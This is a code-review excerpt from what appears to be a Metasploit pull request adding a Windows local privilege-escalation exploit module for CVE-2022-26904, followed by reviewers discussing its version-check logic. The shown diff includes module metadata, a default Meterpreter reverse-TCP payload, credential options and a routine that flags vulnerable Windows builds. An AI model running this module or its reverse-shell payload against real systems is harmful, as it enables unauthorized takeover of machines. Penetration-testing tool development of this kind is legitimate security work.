modules/exploits/windows/local/cve_2022_26904_superprofile.rb

```diff
@@ -0,0 +1,254 @@
+          ],
+          'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [ CRASH_SAFE, ],
+            'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]
+          },
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+            'WfsDelay' => 30
+          },
+          'AKA' => [ 'SuperProfile' ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),
+      OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])
+    ])
+  end
+
+  def check
+    sysinfo_value = sysinfo['OS']
+
+    if sysinfo_value !~ /windows/i
+      # Non-Windows systems are definitely not affected.
+      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
+    end
+
+    # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.
+    build_num_raw = session.shell_command_token('cmd.exe /c ver')
+    build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
+    if build_num.nil?
+      print_error("Couldn't retrieve the target's build number!")
+    else
+      build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
+      print_status("Target's build number: #{build_num}")
+    end
+
+    # see https://docs.microsoft.com/en-us/windows/release-information/
+    unless sysinfo_value =~ /(7|8|8\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/
+      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
+    end
+
+    build_num_gemversion = Rex::Version.new(build_num)
+
+    # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from
+    # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history
+    if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11
+      return CheckCode::Appears('Vulnerable Windows 11 build detected!')
+    elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022
+      return CheckCode::Appears('Vulnerable Windows 11 build detected!')
+    elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2
+      return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
+    elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1
```

Comment:
Everything below this looks like it appears vulnerable but isn't supported. You don't really need to tell the user the version of windows, just that it's vulnerable but not supported.

Eventually we should have code in metasploit for mapping the version number to the human name like 20H2 or whatever, but that doesn't really need to be here.

Reply:
A library with some form of normalization and version comparison would be great.

Then we can stop doing this:

```ruby
/(7|8|8\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/
```